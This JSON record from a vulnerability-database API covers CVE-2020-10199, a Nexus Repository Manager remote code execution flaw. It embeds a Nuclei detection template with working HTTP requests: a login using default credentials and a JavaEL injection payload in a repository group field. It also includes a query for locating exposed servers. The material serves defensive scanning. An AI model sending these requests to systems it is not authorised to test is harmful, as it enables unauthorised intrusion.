{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2020-10199/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2020-10199/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2020-10199/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2020-10199/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2020-10199/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2020-10199"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2020-10199"
    }
  },
  "enrichments": {
    "cisa-kev": {
      "kev": true
    },
    "epss": {
      "epss": 0.99064,
      "kev": true,
      "percentile": 0.99931
    },
    "nuclei": {
      "nuclei": true,
      "nuclei_template": "http/cves/2020/CVE-2020-10199.yaml",
      "nuclei_template_severity": "high",
      "nuclei_template_yaml": "id: CVE-2020-10199\n\ninfo:\n  name: Sonatype Nexus Repository Manager 3 - Remote Code Execution\n  author: rootxharsh,iamnoooob,pdresearch\n  severity: high\n  description: Sonatype Nexus Repository before 3.21.2 allows JavaEL Injection\n  impact: |\n    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.\n  remediation: |\n    Apply the latest security patches or upgrade to a non-vulnerable version of Sonatype Nexus Repository Manager 3.\n  reference:\n    - https://twitter.com/iamnoooob/status/1246182773427240967\n    - https://securitylab.github.com/advisories/GHSL-2020-011-nxrm-sonatype\n    - https://nvd.nist.gov/vuln/detail/CVE-2020-10199\n    - http://packetstormsecurity.com/files/157261/Nexus-Repository-Manager-3.21.1-01-Remote-Code-Execution.html\n    - https://cwe.mitre.org/data/definitions/917.html\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 8.8\n    cve-id: CVE-2020-10199\n    cwe-id: CWE-917\n    epss-score: 0.99064\n    epss-percentile: 0.99931\n    cpe: cpe:2.3:a:sonatype:nexus:*:*:*:*:*:*:*:*\n  metadata:\n    max-request: 2\n    vendor: sonatype\n    product: nexus\n    fofa-query: title=\"nexus repository manager\"\n  tags: cve2020,cve,packetstorm,sonatype,nexus,rce,kev,vkev,vuln\nvariables:\n  username: admin\n  password: admin123\n\nhttp:\n  - raw:\n      - |\n        POST /service/rapture/session HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded; charset=UTF-8\n\n        username={{base64(username)}}&password={{base64(password)}}\n      - |\n        POST /service/rest/beta/repositories/bower/group HTTP/1.1\n        Host: {{Hostname}}\n        NX-ANTI-CSRF-TOKEN: 1\n        Cookie: NX-ANTI-CSRF-TOKEN=1\n        Content-Type: application/json\n\n        {\"name\": \"internal\", \"online\": \"true\", \"storage\": {\"blobStoreName\": \"default\", \"strictContentTypeValidation\": \"true\"}, \"group\": {\"memberNames\": [\"$\\\\A{3*3333}\"]}}\n\n    host-redirects: true\n    max-redirects: 2\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"Member repository does not exist: A9999\"\n\n      - type: status\n        status:\n          - 400\n# digest: 4b0a00483046022100cb9f1e20f514720b92ce3bee97ff7ecf3f924432ef5c72c2fcada7a02be8f8e3022100d115a4b41959f2c38cb36eccd8c3c2ac68ef1bf7d5bbb32641d91ef4e9b89e13:922c64590222798bb761d5b6d8e72950"
    }
  },
  "vuln_id": "cve-2020-10199"
}